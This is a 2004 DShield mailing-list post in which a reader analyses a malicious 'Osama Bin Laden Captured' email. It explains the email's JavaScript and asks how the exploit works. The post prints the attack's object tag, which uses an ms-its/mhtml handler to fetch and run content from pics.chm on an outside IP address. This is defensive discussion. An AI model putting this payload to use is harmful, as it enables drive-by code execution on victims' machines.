[Dshield] FW: Osama Bin Laden Captured

Pete Cap peteoutside at yahoo.com
Fri Apr 23 18:29:22 GMT 2004


Greetings, List:
 
I know very little about Javascript but here's what I was able to figure out, for what it's worth.
 
The activex objects call the script S, which has two lines:
var s=location.href.substr(7);        // drop the leading "http://" (7 characters) from the current URL
return s.substr(0,s.indexOf('/'))     // keep everything up to the first "/", i.e. the host part
 
The first line defines the variable "s" as a substring of variable "location.href" (the current url in the browser window--in this case, http://220.95.231.54/pics/) starting at position 7 (i.e. excluding the http:// portion).
 
The second line returns ANOTHER substring of the resulting text ("220.95.231.54/pics") starting at position 0 and going to however long it is to the first instance of "/"...so you end up with this:
 
object data="ms-its:mhtml:file://c:\foo.mht!http://220.95.231.54/pics.chm::/pics.htm" type="text/x-scriptlet"
 
I don't know if all that rigmarole helps to obfuscate the url, but essentially I think what it's for is to make tailoring the e-mail easy...in order to point to a new download source, you don't need to modify the javascript, only the url that the user clicks on.
 
I also don't know why the first attempt occurs inside a textarea...
 
As far as the exploit goes, essentially what's happening is the browser is extracting foo.mht from pics.chm and executing it as C:\pics.htm, correct?  And this can be any kind of executable content?  Have I got this right?

Couple of questions:
1. Could you just use a browser redirect to start this process or is it essential that the user click on the link?
2. Does the process by which the hostile content is retrieved need to be in an OBJECT tag or can it be in any data request (e.g. an IMG tag)?
3. Why does one attempt in this example occur in a textarea?
 
Hope someone can help.
 
Regards,
Pete

		
---------------------------------
Do you Yahoo!?
Yahoo! Photos: High-quality 4x6 digital prints for 25¢

